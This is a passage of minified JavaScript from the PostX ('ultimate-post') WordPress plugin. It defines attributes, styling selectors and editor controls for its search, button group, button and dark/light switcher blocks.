}"}]},resultSeparatorEnable:{type:"boolean",default:!0},resultSeparatorColor:{type:"string",default:"#DEDEDE",style:[{depends:[{key:"resultSeparatorEnable",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-search-result__item { border-color: {{resultSeparatorColor}} !important; }"}]},resultSeparatorWidth:{type:"object",default:{lg:"1",unit:"px"},style:[{depends:[{key:"moreResultsbtn",condition:"==",value:!0},{key:"resultSeparatorEnable",condition:"==",value:!0},{key:"resMoreResultDevider",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-viewall-results { border-top: {{resultSeparatorWidth}} solid !important; }"},{depends:[{key:"moreResultsbtn",condition:"==",value:!0},{key:"resMoreResultDevider",condition:"!=",value:!0},{key:"resultSeparatorEnable",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-search-result__item { border-top: {{resultSeparatorWidth}} solid; } \n                {{ULTP}} .ultp-search-result__item { margin-top: -{{resultSeparatorWidth}}; }"},{depends:[{key:"moreResultsbtn",condition:"!=",value:!0},{key:"resultSeparatorEnable",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-search-result__item { border-top: {{resultSeparatorWidth}} solid; } \n                {{ULTP}} .ultp-search-result__item { margin-top: -{{resultSeparatorWidth}}; }"}]},resMoreResultDevider:{type:"boolean",default:!0,style:[{depends:[{key:"resultSeparatorEnable",condition:"==",value:!0},{key:"moreResultsbtn",condition:"==",value:!0}]}]},moreResultsbtn:{type:"boolean",default:!0},viewMoreResultText:{type:"string",default:"View More Results"},moreResultPosts:{type:"string",default:3,style:[{depends:[{key:"moreResultsbtn",condition:"==",value:!0}]}]},moreResultsText:{type:"string",default:"View More Results"},moreResultsTypo:{type:"object",default:{openTypography:1,size:{lg:14,unit:"px"},height:{lg:23,unit:"px"},decoration:"none",family:"",weight:500},style:[{selector:"{{ULTP}} .ultp-viewall-results"}]},moreResultsColor:{type:"string",default:"#646464",style:[{selector:"{{ULTP}} .ultp-viewall-results { color:{{moreResultsColor}}; }"}]},moreResultsHoverColor:{type:"string",default:"#000",style:[{selector:"{{ULTP}} .ultp-viewall-results:hover { color:{{moreResultsHoverColor}}; }"}]},loadingColor:{type:"string",default:"#000",style:[{selector:"{{ULTP}} .ultp-result-loader.active:before, \n            {{ULTP}} .ultp-viewmore-loader.viewmore-active { border-color: {{loadingColor}} {{loadingColor}}  {{loadingColor}} transparent !important; }"}]},advanceId:{type:"string",default:""},advanceZindex:{type:"string",default:"",style:[{selector:"{{ULTP}} .ultp-block-wrapper { z-index:{{advanceZindex}};}"}]},hideExtraLarge:{type:"boolean",default:!1,style:[{selector:"{{ULTP}} {display:none;}"}]},hideTablet:{type:"boolean",default:!1,style:[{selector:"{{ULTP}} {display:none;}"}]},hideMobile:{type:"boolean",default:!1,style:[{selector:"{{ULTP}} {display:none;}"}]},advanceCss:{type:"string",default:"",style:[{selector:""}]}}},15816:(e,t,l)=>{"use strict";var o=l(67294),a=l(83100),i=l(52021),n=l(85258),r=l(12728);const{__}=wp.i18n,{registerBlockType:s}=wp.blocks,p=(0,a.Z)("https://wpxpo.com/docs/postx/all-blocks/search-block/","block_docs");s(r,{icon:(0,o.createElement)("img",{className:"ultp-block-icon",src:ultp_data.url+"assets/img/blocks/advanced-search.svg"}),description:(0,o.createElement)("span",{className:"ultp-block-info"},__("Ensure effortless content searching.","ultimate-post"),(0,o.createElement)("a",{target:"_blank",href:p,rel:"noreferrer"},__("Documentation","ultimate-post"))),attributes:n.Z,example:{attributes:{previewImg:ultp_data.url+"assets/img/preview/search.svg"}},edit:i.Z,save:()=>null})},77750:(e,t,l)=>{"use strict";l.d(t,{Z:()=>b});var o=l(67294),a=l(53049),i=l(99838),n=l(31760),r=l(15242);const{__}=wp.i18n,{InspectorControls:s,InnerBlocks:p,useBlockProps:c}=wp.blockEditor,{useEffect:u,useState:d,Fragment:m}=wp.element,{getBlockAttributes:g,getBlockRootClientId:y}=wp.data.select("core/block-editor");function b(e){const[t,l]=d("Content"),{setAttributes:b,name:v,attributes:h,className:f,clientId:k,attributes:{blockId:w,currentPostId:x,advanceId:T,btnAnimation:_,previewImg:C}}=e;u((()=>{const e=k.substr(0,6),t=g(y(k));(0,a.qi)(b,t,x,k),w?w&&w!=e&&(t?.hasOwnProperty("ref")||(0,a.k0)()||t?.hasOwnProperty("theme")||b({blockId:e})):b({blockId:e})}),[k]);const E={setAttributes:b,name:v,attributes:h,setSection:l,section:t,clientId:k};let S;if(w&&(S=(0,i.Kh)(h,"ultimate-post/button-group",w,(0,a.k0)())),C)return(0,o.createElement)("img",{style:{marginTop:"0px",width:"420px"},src:C});const P=c({...T&&{id:T},className:`ultp-block-${w} ${f}`});return(0,o.createElement)(m,null,(0,o.createElement)(s,null,(0,o.createElement)(r.Z,{store:E})),(0,o.createElement)(n.Z,{include:[{type:"template"}],store:E}),(0,o.createElement)("div",P,S&&(0,o.createElement)("style",{dangerouslySetInnerHTML:{__html:S}}),(0,o.createElement)("div",{className:"ultp-button-wrapper"+(_?" ultp-anim-"+_:"")},(0,o.createElement)(p,{template:[["ultimate-post/button",{}]],allowedBlocks:["ultimate-post/button"]}))))}},63133:(e,t,l)=>{"use strict";l.d(t,{Z:()=>r});var o=l(67294);const{Component:a}=wp.element,{InnerBlocks:i,useBlockProps:n}=wp.blockEditor;function r(e){const{blockId:t,advanceId:l,btnAnimation:a}=e.attributes,r=n.save({...l&&{id:l},className:`ultp-block-${t}`});return(0,o.createElement)("div",r,(0,o.createElement)("div",{className:`ultp-button-wrapper ultp-button-frontend ultp-anim-${a}`},(0,o.createElement)(i.Content,null)))}},15242:(e,t,l)=>{"use strict";l.d(t,{Z:()=>r});var o=l(67294),a=l(53049),i=l(92637),n=l(43581);const{__}=wp.i18n,r=({store:e})=>{const{btnAnimation:t,btnVeticalPosition:l}=e.attributes;let r="";switch(t){case"style1":case"style2":r="Control The Background From Button Background";break;case"style3":case"style4":r="Control The Box-shadow From Button Background"}let s=["juststart","justcenter","justend","justbetween","justaround","justevenly"];return l&&(s=["juststart","justcenter","justend"]),(0,o.createElement)(o.Fragment,null,(0,o.createElement)(n.default,{prev:"https://www.wpxpo.com/postx/blocks/#demoid7952",store:e}),(0,o.createElement)(i.Sections,null,(0,o.createElement)(i.Section,{slug:"global",title:__("Global Style","ultimate-post")},(0,o.createElement)(a.T,{title:"inline",include:[{position:1,data:{type:"range",key:"btnItemSpace",min:0,max:300,step:1,responsive:!0,label:__("Button Gap","ultimate-post")}},{position:2,data:{type:"alignment",key:"btnJustifyAlignment",icons:s,options:["flex-start","center","flex-end","space-between","space-around","space-evenly"],label:__("Horizontal Alignment","ultimate-post")}},{position:3,data:{type:"alignment",block:"button",key:"btnVeticalAlignment",disableJustify:!0,icons:["algnStart","algnCenter","algnEnd","stretch"],options:["flex-start","center","flex-end","stretch"],label:__("Vertical Alignment","ultimate-post")}},{position:4,data:{type:"toggle",key:"btnVeticalPosition",label:__("Vertical Alignment","ultimate-post")}},{position:5,data:{type:"dimension",key:"btnWrapMargin",step:1,unit:!0,responsive:!0,label:__("Margin","ultimate-post")}}],initialOpen:!0,store:e}),(0,o.createElement)(a.T,{title:__("Button Animation","ultimate-post"),include:[{position:1,data:{type:"select",key:"btnAnimation",label:__("Button Aniation","ultimate-post"),options:[{value:"none",label:__("None","ultimate-post")},{value:"style1",label:__("Style 1","ultimate-post")},{value:"style2",label:__("Style 2","ultimate-post")},{value:"style3",label:__("Style 3","ultimate-post")},{value:"style4",label:__("Style 4","ultimate-post")}],help:r}},{position:2,data:{type:"range",key:"btnTranslate",min:-20,max:20,step:.5,responsive:!0,label:__("Button Transform","ultimate-post"),unit:["px"],help:"Control Button Position"}}],initialOpen:!1,store:e})),(0,o.createElement)(i.Section,{slug:"advanced",title:__("Advanced","ultimate-post")},(0,o.createElement)(a.T,{title:"inline",include:[{position:1,data:{type:"text",key:"advanceId",label:__("ID","ultimate-post")}},{position:2,data:{type:"range",key:"advanceZindex",min:-100,max:1e4,step:1,label:__("z-index","ultimate-post")}}],initialOpen:!0,store:e}),(0,o.createElement)(a.Mg,{store:e}),(0,o.createElement)(a.iv,{store:e}))),(0,a.dH)())}},88309:(e,t,l)=>{"use strict";l.d(t,{Z:()=>o});const o={blockId:{type:"string",default:""},previewImg:{type:"string",default:""},currentPostId:{type:"string",default:""},btnJustifyAlignment:{type:"string",default:"",style:[{depends:[{key:"btnVeticalPosition",condition:"==",value:!1}],selector:"{{ULTP}} .ultp-button-wrapper .block-editor-block-list__layout,\n                {{ULTP}} .ultp-button-wrapper.ultp-button-frontend { justify-content: {{btnJustifyAlignment}}; }"},{depends:[{key:"btnVeticalPosition",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-button-wrapper .block-editor-inner-blocks .block-editor-block-list__layout,\n                {{ULTP}} .ultp-button-wrapper.ultp-button-frontend { align-items: {{btnJustifyAlignment}}; }"}]},btnVeticalAlignment:{type:"string",default:"",style:[{depends:[{key:"btnVeticalPosition",condition:"==",value:!1}],selector:"{{ULTP}} .ultp-button-wrapper .block-editor-inner-blocks .block-editor-block-list__layout,\n                {{ULTP}} .ultp-button-wrapper.ultp-button-frontend { align-items: {{btnVeticalAlignment}}; }\n                {{ULTP}} .ultp-button-wrapper .wp-block-ultimate-post-button { height: 100%; }"}]},btnVeticalPosition:{type:"boolean",default:!1,style:[{depends:[{key:"btnVeticalPosition",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-button-wrapper .block-editor-inner-blocks .block-editor-block-list__layout,\n                {{ULTP}} .ultp-button-wrapper.ultp-button-frontend { flex-direction: column; }"},{depends:[{key:"btnVeticalPosition",condition:"==",value:!1}],selector:"{{ULTP}} .ultp-button-wrapper .block-editor-inner-blocks .block-editor-block-list__layout,\n                {{ULTP}} .ultp-button-wrapper.ultp-button-frontend { flex-direction: row; }"}]},btnItemSpace:{type:"object",default:{lg:"28",unit:"px"},style:[{selector:"{{ULTP}} .ultp-button-wrapper .block-editor-inner-blocks .block-editor-block-list__layout,\n            {{ULTP}} .ultp-button-wrapper.ultp-button-frontend { gap:{{btnItemSpace}};  }"}]},btnWrapMargin:{type:"object",default:{lg:{top:"",bottom:"",left:"",right:"",unit:"px"}},style:[{selector:"{{ULTP}} .ultp-button-wrapper .block-editor-inner-blocks .block-editor-block-list__layout,\n            {{ULTP}} .ultp-button-wrapper.ultp-button-frontend { margin:{{btnWrapMargin}};  }"}]},btnAnimation:{type:"string",default:"none",style:[{depends:[{key:"btnAnimation",condition:"!=",value:"style3"}]},{depends:[{key:"btnAnimation",condition:"==",value:"style3"}],selector:"{{ULTP}} .ultp-button-wrapper.ultp-anim-style3 .wp-block-ultimate-post-button:hover { box-shadow: none; }"}]},btnTranslate:{type:"object",default:{lg:"-5",unit:"px"},style:[{depends:[{key:"btnAnimation",condition:"==",value:"style4"}],selector:"{{ULTP}} .wp-block-ultimate-post-button:hover { transform: translate( {{btnTranslate}}, {{btnTranslate}});  }"}]},advanceId:{type:"string",default:""},advanceZindex:{type:"string",default:"",style:[{selector:"{{ULTP}} .ultp-button-wrapper {z-index: {{advanceZindex}}; }"}]},hideExtraLarge:{type:"boolean",default:!1,style:[{selector:"{{ULTP}} {display:none;}"}]},hideTablet:{type:"boolean",default:!1,style:[{selector:"{{ULTP}} {display:none;}"}]},hideMobile:{type:"boolean",default:!1,style:[{selector:"{{ULTP}} {display:none;}"}]},advanceCss:{type:"string",default:"",style:[{selector:""}]}}},31400:(e,t,l)=>{"use strict";l.d(t,{Z:()=>h});var o=l(67294),a=l(53049),i=l(99838),n=l(31760),r=l(64766),s=l(52441);const{__}=wp.i18n,{InspectorControls:p,useBlockProps:c}=wp.blockEditor,{useState:u,useEffect:d,Fragment:m}=wp.element,{createBlock:g}=wp.blocks,{RichText:y}=wp.blockEditor,{getBlockAttributes:b,getBlockRootClientId:v}=wp.data.select("core/block-editor");function h(e){const[t,l]=u("Content"),{setAttributes:h,name:f,className:k,attributes:w,clientId:x,attributes:{blockId:T,advanceId:_,layout:C,btnIconEnable:E,btntextEnable:S,btnText:P,btnIcon:L,btnLink:I,dcEnabled:B}}=e;d((()=>{const e=x.substr(0,6),t=b(v(x));T?T&&T!=e&&(t?.hasOwnProperty("ref")||(0,a.k0)()||t?.hasOwnProperty("theme")||h({blockId:e})):h({blockId:e})}),[x]);const U={setAttributes:h,name:f,attributes:w,setSection:l,section:t,clientId:x};let M;T&&(M=(0,i.Kh)(w,"ultimate-post/button",T,(0,a.k0)()));const A=c({..._&&{id:_},className:`ultp-block-${T} ultp-button-${C}`});return(0,o.createElement)(m,null,(0,o.createElement)(p,null,(0,o.createElement)(s.Z,{store:U})),(0,o.createElement)(n.Z,{include:[{type:"layout",block:"button",key:"layout",label:__("Style","ultimate-post"),options:[{img:"assets/img/layouts/button/layout1.svg",label:__("Layout 1","ultimate-post"),value:"layout1"},{img:"assets/img/layouts/button/layout2.svg",label:__("Layout 2","ultimate-post"),value:"layout2"},{img:"assets/img/layouts/button/layout3.svg",label:__("Layout 3","ultimate-post"),value:"layout3"},{img:"assets/img/layouts/button/layout4.svg",label:__("Layout 4","ultimate-post"),value:"layout4"}]},{type:"linkbutton",key:"btnLink",onlyLink:!0,value:I,placeholder:"Enter Button URL",label:__("Button Link","ultimate-post")}],store:U}),(0,o.createElement)("div",A,M&&(0,o.createElement)("style",{dangerouslySetInnerHTML:{__html:M}}),E&&(0,o.createElement)("div",{className:"ultp-btnIcon-wrap"},r.ZP[L]),S&&(0,o.createElement)(y,{key:"editable",tagName:"div",className:"ultp-button-text",allowedFormats:["ultimate-post/dynamic-content"],placeholder:__("Click Here…","ultimate-post"),onChange:e=>h({btnText:e}),onReplace:(e,t,l)=>wp.data.dispatch("core/block-editor").replaceBlocks(x,e,t,l),onSplit:(e,t)=>g("ultimate-post/button",{...w,btnText:e}),value:P})))}},55790:(e,t,l)=>{"use strict";l.d(t,{Z:()=>r});var o=l(87462),a=l(67294),i=l(69735);const{useBlockProps:n}=wp.blockEditor;function r(e){const{blockId:t,advanceId:l,layout:r,btnIconEnable:s,btntextEnable:p,btnText:c,btnIcon:u,btnLink:d,btnLinkTarget:m,btnLinkDownload:g,btnLinkNoFollow:y,btnLinkSponsored:b,dcEnabled:v}=e.attributes;let h="noopener";h+=y?" nofollow":"",h+=b?" sponsored":"";const f={};(0,i.o6)()&&v?(f.href="#",f.target=m):d.url&&(f.href=d.url,f.target=m);const k=n.save({...l&&{id:l},className:`ultp-block-${t} ultp-button-${r}`});return(0,a.createElement)("a",(0,o.Z)({},k,f,{rel:h,download:g?"download":void 0}),s&&(0,a.createElement)("div",{className:"ultp-btnIcon-wrap"},"_ultp_btn_ic_"+u+"_ultp_btn_ic_end_"),p&&(0,a.createElement)("div",{className:"ultp-button-text",dangerouslySetInnerHTML:{__html:c}}))}},52441:(e,t,l)=>{"use strict";l.d(t,{Z:()=>n});var o=l(67294),a=l(53049),i=l(92637);const{__}=wp.i18n,n=({store:e})=>(0,o.createElement)(i.Sections,null,(0,o.createElement)(i.Section,{slug:"button",title:__("Button","ultimate-post")},(0,o.createElement)(a.T,{title:"inline",include:[{position:1,data:{type:"layout",block:"button",key:"layout",label:__("Style","ultimate-post"),options:[{img:"assets/img/layouts/button/layout1.svg",label:__("Layout 1","ultimate-post"),value:"layout1"},{img:"assets/img/layouts/button/layout2.svg",label:__("Layout 2","ultimate-post"),value:"layout2"},{img:"assets/img/layouts/button/layout3.svg",label:__("Layout 3","ultimate-post"),value:"layout3"},{img:"assets/img/layouts/button/layout4.svg",label:__("Layout 4","ultimate-post"),value:"layout4"}]}},{position:2,data:{type:"select",key:"btnSize",label:__("Button Size","ultimate-post"),options:[{value:"sm",label:__("Small","ultimate-post")},{value:"md",label:__("Medium","ultimate-post")},{value:"lg",label:__("Large","ultimate-post")},{value:"xl",label:__("Extra Large","ultimate-post")},{value:"custom",label:__("Custom","ultimate-post")}]}},{position:3,data:{type:"dimension",key:"btnBgCustomSize",step:1,unit:!0,responsive:!0,label:__("Button Custom Size","ultimate-post")}},{position:4,data:{type:"linkbutton",key:"btnLink",onlyLink:!0,placeholder:"Enter Button URL",label:__("Button Link","ultimate-post")}}],initialOpen:!0,store:e}),(0,o.createElement)(a.T,{title:__("Text","ultimate-post"),depend:"btntextEnable",include:[{position:1,data:{type:"typography",key:"btnTextTypo",label:__("Text Typography","ultimate-post")}},{position:2,data:{type:"color",key:"btnTextColor",label:__("Text Color","ultimate-post")}},{position:3,data:{type:"color",key:"btnTextHover",label:__("Text Hover Color","ultimate-post")}}],initialOpen:!1,store:e}),(0,o.createElement)(a.T,{title:__("Background","ultimate-post"),include:[{position:1,data:{type:"dimension",key:"btnMargin",step:1,unit:!0,responsive:!0,label:__("Margin","ultimate-post")}},{position:2,data:{type:"tab",content:[{name:"normal",title:__("Normal","ultimate-post"),options:[{type:"color2",key:"btnBgColor",label:__("Background Color","ultimate-post")},{type:"border",key:"btnBorder",label:__("Border","ultimate-post")},{type:"dimension",key:"btnRadius",step:1,unit:!0,responsive:!0,label:__("Border Radius","ultimate-post")},{type:"boxshadow",key:"btnShadow",step:1,unit:!0,responsive:!0,label:__("Box shadow","ultimate-post")}]},{name:"hover",title:__("Hover","ultimate-post"),options:[{type:"color2",key:"btnBgHover",label:__("Background Color","ultimate-post")},{type:"border",key:"btnHoverBorder",label:__("Border","ultimate-post")},{type:"dimension",key:"btnHoverRadius",step:1,unit:!0,responsive:!0,label:__("Border Radius","ultimate-post")},{type:"boxshadow",key:"btnHoverShadow",step:1,unit:!0,responsive:!0,label:__("Box shadow","ultimate-post")}]}]}}],initialOpen:!1,store:e}),(0,o.createElement)(a.T,{title:__("Icon","ultimate-post"),depend:"btnIconEnable",include:[{position:1,data:{type:"icon",key:"btnIcon",label:__("Icon Store","ultimate-post")}},{position:2,data:{type:"toggle",key:"btnIconPosition",label:__("Icon After Text","ultimate-post")}},{position:3,data:{type:"range",key:"btnIconSize",min:0,max:300,step:1,responsive:!0,label:__("Icon Size","ultimate-post")}},{position:4,data:{type:"range",key:"btnIconGap",min:0,max:300,step:1,responsive:!0,label:__("Space Between Icon and Text","ultimate-post")}},{position:5,data:{type:"tab",content:[{name:"normal",title:__("Normal","ultimate-post"),options:[{type:"color",key:"btnIconColor",label:__("Icon Color","ultimate-post")}]},{name:"hover",title:__("Hover","ultimate-post"),options:[{type:"color",key:"btnIconHoverColor",label:__("Icon Color","ultimate-post")}]}]}}],initialOpen:!1,store:e})),(0,o.createElement)(i.Section,{slug:"advanced",title:__("Advanced","ultimate-post")},(0,o.createElement)(a.Mg,{store:e}),(0,o.createElement)(a.iv,{store:e})))},11359:(e,t,l)=>{"use strict";l.d(t,{Z:()=>o});const o={blockId:{type:"string",default:""},layout:{type:"string",default:"layout1"},btnText:{type:"string",default:""},btntextEnable:{type:"boolean",default:!0},btnTextTypo:{type:"object",default:{openTypography:1,size:{lg:16,unit:"px"},height:{lg:20,unit:"px"},decoration:"none",family:"",weight:500},style:[{selector:"{{ULTP}} .ultp-button-text"}]},btnTextColor:{type:"string",default:"",style:[{selector:"{{ULTP}} .ultp-button-text { color:{{btnTextColor}} } "}]},btnTextHover:{type:"string",default:"",style:[{selector:"{{ULTP}}:hover .ultp-button-text { color:{{btnTextHover}} } "}]},btnLink:{type:"object",default:""},btnLinkTarget:{type:"string",default:"_self"},btnLinkNoFollow:{type:"boolean",default:!1},btnLinkSponsored:{type:"boolean",default:!1},btnLinkDownload:{type:"boolean",default:!1},btnSize:{type:"string",default:"custom",style:[{depends:[{key:"btnSize",condition:"==",value:"custom"}]},{depends:[{key:"btnSize",condition:"==",value:"xl"}],selector:"{{ULTP}} { padding: 20px 40px !important; }"},{depends:[{key:"btnSize",condition:"==",value:"lg"}],selector:"{{ULTP}} { padding: 10px 20px !important; }"},{depends:[{key:"btnSize",condition:"==",value:"md"}],selector:"{{ULTP}} { padding: 8px 16px !important; }"},{depends:[{key:"btnSize",condition:"==",value:"sm"}],selector:"{{ULTP}} { padding: 6px 12px !important; }"}]},btnBgCustomSize:{type:"object",default:{lg:{top:"15",bottom:"15",left:"30",right:"30",unit:"px"}},style:[{depends:[{key:"btnSize",condition:"==",value:"custom"}],selector:"{{ULTP}} { padding:{{btnBgCustomSize}} !important; }"}]},btnMargin:{type:"object",default:{lg:"",unit:"px"},style:[{selector:"{{ULTP}} { margin:{{btnMargin}}; }"}]},btnBgColor:{type:"object",default:{openColor:0,type:"color",color:"",gradient:{}},style:[{selector:".ultp-anim-none {{ULTP}}.wp-block-ultimate-post-button,\n            .ultp-anim-style1 {{ULTP}}.wp-block-ultimate-post-button, \n            .ultp-anim-style2 {{ULTP}}.wp-block-ultimate-post-button:before, \n            .ultp-anim-style3 {{ULTP}}.wp-block-ultimate-post-button, \n            .ultp-anim-style4 {{ULTP}}.wp-block-ultimate-post-button"}]},btnBorder:{type:"object",default:{openBorder:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4",type:"solid"},style:[{selector:".wp-block-ultimate-post-button-group .ultp-button-wrapper \n            {{ULTP}}.wp-block-ultimate-post-button"}]},btnRadius:{type:"object",default:{lg:"",unit:"px"},style:[{selector:".wp-block-ultimate-post-button-group .ultp-button-wrapper \n            {{ULTP}}.wp-block-ultimate-post-button { border-radius:{{btnRadius}}; }"}]},btnShadow:{type:"object",default:{openShadow:0,width:{top:3,right:3,bottom:0,left:0},color:"#FFB714"},style:[{selector:".wp-block-ultimate-post-button-group .ultp-button-wrapper \n            {{ULTP}}.wp-block-ultimate-post-button"}]},btnBgHover:{type:"object",default:{openColor:0,type:"color",color:"",gradient:{}},style:[{selector:".ultp-anim-none {{ULTP}}.wp-block-ultimate-post-button:before, \n            .ultp-anim-style1 {{ULTP}}.wp-block-ultimate-post-button:before, \n            .ultp-anim-style2 {{ULTP}}.wp-block-ultimate-post-button, \n            .ultp-anim-style3 {{ULTP}}.wp-block-ultimate-post-button:before, \n            .ultp-anim-style4 {{ULTP}}.wp-block-ultimate-post-button:before"}]},btnHoverBorder:{type:"object",default:{openBorder:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4",type:"solid"},style:[{selector:".wp-block-ultimate-post-button-group .ultp-button-wrapper \n            {{ULTP}}.wp-block-ultimate-post-button:hover"}]},btnHoverRadius:{type:"object",default:{lg:"",unit:"px"},style:[{selector:".wp-block-ultimate-post-button-group .ultp-button-wrapper {{ULTP}}.wp-block-ultimate-post-button:hover { border-radius:{{btnHoverRadius}}; }"}]},btnHoverShadow:{type:"object",default:{openShadow:0,width:{top:3,right:3,bottom:0,left:0},color:"#FFB714"},style:[{selector:".wp-block-ultimate-post-button-group .ultp-button-wrapper {{ULTP}}.wp-block-ultimate-post-button:hover"}]},btnIconEnable:{type:"boolean",default:!1},btnIcon:{type:"string",default:"arrow_right_circle_line"},btnIconPosition:{type:"boolean",default:!1,style:[{depends:[{key:"btnIconPosition",condition:"==",value:!1}],selector:"{{ULTP}} { flex-direction: row }"},{depends:[{key:"btnIconPosition",condition:"==",value:!0}],selector:"{{ULTP}} { flex-direction: row-reverse }"}]},btnIconSize:{type:"object",default:{lg:"17",unit:"px"},style:[{selector:"{{ULTP}} .ultp-btnIcon-wrap svg { height: {{btnIconSize}}; width: {{btnIconSize}}; }"}]},btnIconGap:{type:"object",default:{lg:"12",unit:"px"},style:[{selector:"{{ULTP}} { gap: {{btnIconGap}}; }"}]},btnIconColor:{type:"string",default:"#fff",style:[{selector:"{{ULTP}} > .ultp-btnIcon-wrap svg { color:{{btnIconColor}}; } "}]},btnIconHoverColor:{type:"string",default:"#f2f2f2",style:[{selector:"{{ULTP}}:hover > .ultp-btnIcon-wrap svg { color:{{btnIconHoverColor}}; }"}]},hideExtraLarge:{type:"boolean",default:!1,style:[{selector:"div:has( > {{ULTP}}) {display:none;}"}]},hideTablet:{type:"boolean",default:!1,style:[{selector:"div:has( > {{ULTP}}) {display:none;}"}]},hideMobile:{type:"boolean",default:!1,style:[{selector:"div:has( > {{ULTP}}) {display:none;}"}]},advanceCss:{type:"string",default:"",style:[{selector:""}]},...l(69735).KF}},47795:(e,t,l)=>{"use strict";l.d(t,{Z:()=>r});var o=l(87462),a=l(67294),i=l(69735),n=l(83245);const r=[{attributes:{...l(11359).Z},save({attributes:e}){const{blockId:t,advanceId:l,layout:r,btnIconEnable:s,btntextEnable:p,btnText:c,btnIcon:u,btnLink:d,btnLinkTarget:m,btnLinkDownload:g,btnLinkNoFollow:y,btnLinkSponsored:b,version:v,dcEnabled:h}=e;let f="noopener";f+=y?" nofollow":"",f+=b?" sponsored":"";const k={};return(0,i.o6)()&&h?(k.href="#",k.target=m):d.url&&(k.href=d.url,k.target=m),(0,a.createElement)("a",(0,o.Z)({},l&&{id:l},{className:`ultp-block-${t} ultp-button-${r}`},k,{rel:f,download:g&&"download"}),s&&(0,a.createElement)("div",{className:"ultp-btnIcon-wrap"},n.ZP[u]),p&&(0,a.createElement)("div",{className:"ultp-button-text",dangerouslySetInnerHTML:{__html:c}}))}}]},5109:(e,t,l)=>{"use strict";var o=l(67294),a=l(31400),i=l(55790),n=l(11359),r=l(4405),s=l(47795);const{__}=wp.i18n,{registerBlockType:p}=wp.blocks;p(r,{parent:["ultimate-post/button-group"],icon:(0,o.createElement)("img",{className:"ultp-block-icon",src:ultp_data.url+"assets/img/blocks/button.svg",alt:"button svg"}),attributes:n.Z,supports:{reusable:!1,html:!1},edit:a.Z,save:i.Z,deprecated:s.Z})},24072:(e,t,l)=>{"use strict";var o=l(67294),a=l(83100),i=l(77750),n=l(63133),r=l(88309),s=l(14331);const{__}=wp.i18n,{registerBlockType:p}=wp.blocks,c=(0,a.Z)("https://wpxpo.com/docs/postx/all-blocks/button-block/","block_docs");p(s,{icon:(0,o.createElement)("img",{className:"ultp-block-icon",src:ultp_data.url+"assets/img/blocks/button-group.svg",alt:"button group"}),description:(0,o.createElement)("span",{className:"ultp-block-info"},__("Create & customize multiple button-styles","ultimate-post"),(0,o.createElement)("a",{target:"_blank",href:c,rel:"noreferrer"},__("Documentation","ultimate-post"))),attributes:r.Z,example:{attributes:{previewImg:ultp_data.url+"assets/img/preview/button.svg"}},edit:i.Z,save:n.Z})},90466:(e,t,l)=>{"use strict";l.d(t,{Z:()=>b});var o=l(67294),a=l(53049),i=l(99838),n=l(92637),r=l(82044),s=l(55404);const{__}=wp.i18n,{InspectorControls:p,useBlockProps:c}=wp.blockEditor,{useState:u,useEffect:d,Fragment:m}=wp.element,{getBlockAttributes:g,getBlockRootClientId:y}=wp.data.select("core/block-editor");function b(e){const[t,l]=u("Content"),{setAttributes:b,name:v,clientId:h,className:f,attributes:k,attributes:{blockId:w,previewImg:x,advanceId:T,layout:_,iconType:C,reverseSwitcher:E,lightText:S,darkText:P,enableText:L,textAppears:I,previewDark:B,currentPostId:U,blockPubDate:M}}=e;d((()=>{const e=h.substr(0,6),t=g(y(h));(0,a.qi)(b,t,U,h),w?w&&w!=e&&(t?.hasOwnProperty("ref")||(0,a.k0)()||t?.hasOwnProperty("theme")||b({blockId:e})):b({blockId:e}),"empty"==M&&b({blockPubDate:(new Date).toISOString()})}),[h]);const A={setAttributes:b,name:v,attributes:k,setSection:l,section:t,clientId:h};let H;if(w&&(H=(0,i.Kh)(k,"ultimate-post/dark-light",w,(0,a.k0)())),x)return(0,o.createElement)("img",{style:{marginTop:"0px",width:"420px"},src:x});const N=c({...T&&{id:T},className:`ultp-block-${w} ${f}`});return(0,o.createElement)(m,null,(0,o.createElement)(p,null,(0,o.createElement)(n.Sections,null,(0,o.createElement)(n.Section,{slug:"dark-light-setting",title:__("Style","ultimate-post")},(0,o.createElement)(a.T,{title:"inline",include:[{position:5,data:{type:"layout",block:"dark-light",key:"layout",label:__("Layout","ultimate-post"),options:[{img:"assets/img/layouts/dark_light/dark1.svg",label:"Layout 1",value:"layout1",pro:!1},{img:"assets/img/layouts/dark_light/dark2.svg",label:"Layout 2",value:"layout2",pro:!1},{img:"assets/img/layouts/dark_light/dark3.svg",label:"Layout 3",value:"layout3",pro:!1},{img:"assets/img/layouts/dark_light/dark4.svg",label:"Layout 4",value:"layout4",pro:!1},{img:"assets/img/layouts/dark_light/dark5.svg",label:"Layout 5",value:"layout5",pro:!1},{img:"assets/img/layouts/dark_light/dark6.svg",label:"Layout 6",value:"layout6",pro:!1},{img:"assets/img/layouts/dark_light/dark7.svg",label:"Layout 7",value:"layout7",pro:!1}]}},{position:6,data:{type:"toggle",key:"previewDark",label:__("Preview Dark Design","ultimate-post")}},{position:10,data:{type:"group",key:"iconType",justify:!0,label:__("Icon Type","ultimate-post"),options:[{value:"line",label:__("Line","ultimate-post")},{value:"solid",label:__("Solid","ultimate-post")}]}},{position:15,data:{type:"range",key:"iconSize",min:10,max:300,step:1,responsive:!1,label:__("Icon Size","ultimate-post")}},{position:20,data:{type:"toggle",key:"reverseSwitcher",label:__("Reverse Switcher","ultimate-post")}},{position:25,data:{type:"toggle",key:"enableText",label:__("Enable Text","ultimate-post")}},{position:26,data:{type:"select",key:"textAppears",label:__("Text Appears","ultimate-post"),options:[{value:"left",label:__("Selected (Left)","ultimate-post")},{value:"right",label:__("Selected (Right)","ultimate-post")},{value:"both",label:__("Both","ultimate-post")}]}},{position:30,data:{type:"text",key:"lightText",label:__("Light Mode Text","ultimate-post")}},{position:35,data:{type:"text",key:"darkText",label:__("Dark Mode Text","ultimate-post")}},{position:40,data:{type:"typography",key:"textTypo",label:__("Text Typography","ultimate-post")}},{position:45,data:{type:"range",key:"textSwictherGap",min:0,max:300,step:1,responsive:!1,label:__("Text to Switcher Gap","ultimate-post")}},{position:50,data:{type:"separator",label:__("Switcher Color","ultimate-post")}},{position:55,data:{type:"tab",content:[{name:"light",title:__("Light 